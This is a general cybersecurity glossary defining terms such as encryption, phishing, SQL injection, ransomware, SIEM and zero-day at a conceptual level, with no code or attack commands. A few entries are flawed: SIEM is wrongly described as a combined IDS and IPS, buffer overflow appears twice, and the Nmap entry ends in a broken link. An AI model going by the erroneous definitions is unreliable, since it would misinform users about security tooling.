Glossary
Access control:
The process of limiting access to resources based on predetermined rules.
Asset management:
The process of identifying, classifying, and managing an organization's assets, including hardware, software, and data.
Asymmetric encryption:
A type of encryption that uses a public key and a private key to secure data.
Authentication:
The process of verifying the identity of a user or device.
Authorization:
The process of granting or denying access to resources based on an authenticated identity.
Black hat:
A type of hacker who engages in illegal or malicious activities, such as stealing data or spreading malware.
Blue team:
A group responsible for defending against and responding to security threats.
Brute Force Attack:
A type of password attack in which the attacker uses a program to try every possible combination of characters until the correct password is found.
Buffer overflow:
A type of cyber attack that involves sending more data to a buffer than it can handle, resulting in the overwriting of adjacent memory and potentially allowing an attacker to execute arbitrary code.
Buffer Overflow Attack:
A type of attack in which the attacker sends more data to a buffer than it is designed to hold, causing the program to crash or execute arbitrary code.
Business continuity plan (BCP):
A plan that outlines the steps an organization should take to ensure that its critical functions can continue in the event of a disaster or other disruption.
Change management:
The process of controlling and documenting changes to a system or network to ensure that they are implemented safely and effectively.
Cross-site scripting (XSS):
A type of cyber attack that involves injecting malicious code into a website to execute on the client-side (in the user's browser).
Cryptography:
The practice of secure communication through the use of codes and ciphers.
Data classification:
The process of categorizing data based on its sensitivity and value.
Data loss prevention (DLP):
A security strategy that aims to prevent the unauthorized disclosure or loss of sensitive data.
Data masking:
The process of obscuring sensitive data to protect it from unauthorized access.
Data privacy:
The protection of personal information from unauthorized access and use.
DDoS:
Short for "distributed denial of service," it refers to a type of cyber attack that involves overwhelming a target with traffic to disrupt its services.
Decryption:
The process of converting ciphertext into plaintext (readable text) to access secure data.
Dictionary Attack:
A type of password attack in which the attacker uses a pre-computed list of common passwords or words to try and guess the correct password.
Disaster recovery plan (DRP):
A plan that outlines the steps an organization should take to recover from a disaster or other disruption.
Encryption:
The process of converting plaintext into ciphertext (unreadable text) to secure data.
Endpoint security:
The protection of devices that connect to a network.
Exploit:
A piece of code or tool that takes advantage of a vulnerability to gain unauthorized access or perform other malicious actions.
Firewall:
A security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
Gray hat:
A type of hacker who may engage in both legal and illegal activities, depending on the situation.
Hash function:
A mathematical function that converts an input (called a "message") into a fixed-size output (called a "hash value" or "digest").
Hashing:
The process of creating a fixed-size representation of data, called a hash, that is designed to be unique to the original data.
Incident response:
The process of responding to and managing the aftermath of a security incident.
Intrusion detection system (IDS):
A system that monitors network traffic for signs of suspicious activity and alerts administrators when a potential threat is detected.
Intrusion prevention system (IPS):
A system that monitors network traffic for signs of suspicious activity and automatically takes action to prevent potential threats.
Least privilege:
The practice of granting users and processes the minimum level of access necessary to perform their tasks.
Malware:
Short for "malicious software," it refers to any software designed to cause harm or exploit vulnerabilities on a computer system.
Multi-factor authentication (MFA):
A security process in which a user provides multiple authentication factors to verify their identity.
Nmap:
A free and open-source network scanner that can be used to discover hosts and services on a computer network. [nmap.org](https
Password Attack:
A type of attack in which the attacker attempts to guess or crack a password to gain unauthorized access.
Password manager:
A tool that stores and manages passwords in a secure manner.
Patch:
A piece of software designed to fix a vulnerability in a system or application.
Penetration testing:
The practice of simulating a cyber attack on a system or network to test its defenses and identify vulnerabilities.
Phishing:
A type of social engineering attack that involves tricking people into revealing sensitive information or clicking on malicious links.
Rainbow Table:
A pre-computed table of hashes used in password cracking attacks.
Ransomware:
A type of malware that encrypts a victim's files and demands a ransom from the victim to restore access.
Red team:
A group that plays the role of an enemy or competitor to provide security feedback from that perspective.
Rootkit:
A type of malware that is designed to gain root access to a system (the highest level of access) and remain hidden from detection.
Salting:
The practice of adding random data to the input of a hash function to make it more difficult to crack passwords through pre-computed tables or dictionary attacks.
Script kiddie:
A person who uses pre-existing tools and scripts to carry out hacking attacks, without having a deep understanding of how they work.
Security incident:
A breach of security that results in unauthorized access or other malicious activity.
Security incident response plan (SIRP):
A plan of action for responding to and recovering from a security incident.
Security information and event management (SIEM):
A security solution that combines the functions of an intrusion detection system (IDS) and an intrusion prevention system (IPS).
Security operations center (SOC):
A centralized unit responsible for monitoring and responding to security threats.
Security orchestration, automation, and response (SOAR):
A security solution that combines the functions of security information and event management (SIEM) and incident response to automate the handling of security incidents.
Single sign-on (SSO):
A system that allows users to use a single set of login credentials to access multiple applications.
Social engineering:
A type of attack that relies on psychological manipulation to trick people into revealing sensitive information or taking actions that compromise security.
SQL injection:
A type of cyber attack that involves injecting malicious code into a database through an SQL query.
Symmetric encryption:
A type of encryption that uses a single key to both encrypt and decrypt data.
Threat hunting:
The proactive search for potential security threats within an organization's network.
Threat intelligence:
The collection and analysis of information about potential threats to an organization.
Two-factor authentication (2FA):
A security process in which a user provides two different authentication factors to verify their identity.
Virtual Private Network (VPN):
A network that allows users to securely connect to a remote network over the internet.
Vulnerability:
A weakness in a system or application that can be exploited by an attacker.
Vulnerability management:
The process of identifying, classifying, and mitigating vulnerabilities in a system or network.
White hat:
A type of hacker who uses their skills for ethical purposes, such as helping organizations improve their security.
Zero-day:
A previously unknown vulnerability that is being actively exploited by hackers.